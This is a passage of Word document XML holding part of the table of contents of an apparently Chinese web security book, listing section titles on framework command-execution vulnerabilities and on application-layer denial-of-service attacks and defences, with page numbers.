          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Struts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>命令执行漏洞</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>290</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Struts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>的问题补丁</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>291</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>命令执行漏洞</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>292</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>命令执行漏洞</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>293</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:before="56"/>
        <w:ind w:left="1031" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:group style="position:absolute;margin-left:12.72pt;margin-top:19.640001pt;width:411.15pt;height:16.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:1984" coordorigin="254,393" coordsize="8223,322">
            <v:rect style="position:absolute;left:254;top:392;width:8223;height:322" filled="true" fillcolor="#dadada" stroked="false">
              <v:fill type="solid"/>
            </v:rect>
            <v:shape style="position:absolute;left:1317;top:414;width:7139;height:277" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:pos="7118" w:val="right" w:leader="dot"/>
                      </w:tabs>
                      <w:spacing w:line="276" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>应用</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>层</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>拒</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="7"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>绝服</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="10"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>务攻击</w:t>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                        <w:spacing w:val="5"/>
                        <w:sz w:val="18"/>
                      </w:rPr>
                      <w:t>295</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <v:shape style="position:absolute;left:283;top:460;width:810;height:236" type="#_x0000_t202" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:line="236" w:lineRule="exact" w:before="0"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="left"/>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>第 </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="1"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>13</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
                        <w:spacing w:val="-33"/>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="21"/>
                      </w:rPr>
                      <w:t>章</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none"/>
            </v:shape>
            <w10:wrap type="none"/>
          </v:group>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>12.8</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>小结</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>294</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1630" w:val="left" w:leader="none"/>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="536" w:after="0"/>
        <w:ind w:left="1630" w:right="0" w:hanging="599"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DDOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>简介</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>295</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-33"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DDOS</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>297</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="80" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>攻击</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>297</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="82" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>限制请求频率</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>298</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>道高一尺，魔高一丈</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>300</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="57" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>的那</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>事儿</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>301</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="55" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="-33"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DDOS</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>304</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="56" w:after="0"/>
        <w:ind w:left="1631" w:right="0" w:hanging="600"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>资源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>耗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>尽攻击</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>306</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="81" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Slowloris</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hint="eastAsia"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>攻击</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>306</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="103" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="12"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DOS</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>309</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="583"/>
        <w:ind w:left="0" w:right="224" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="70"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:w w:val="75"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>XIII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="70"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="2216" w:val="left" w:leader="none"/>
          <w:tab w:pos="2217" w:val="left" w:leader="none"/>
          <w:tab w:pos="8355" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="171" w:after="0"/>
        <w:ind w:left="2216" w:right="0" w:hanging="691"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DOS</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>310</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1631" w:val="left" w:leader="none"/>
          <w:tab w:pos="1632" w:val="left" w:leader="none"/>
          <w:tab w:pos="8348" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="59" w:after="0"/>
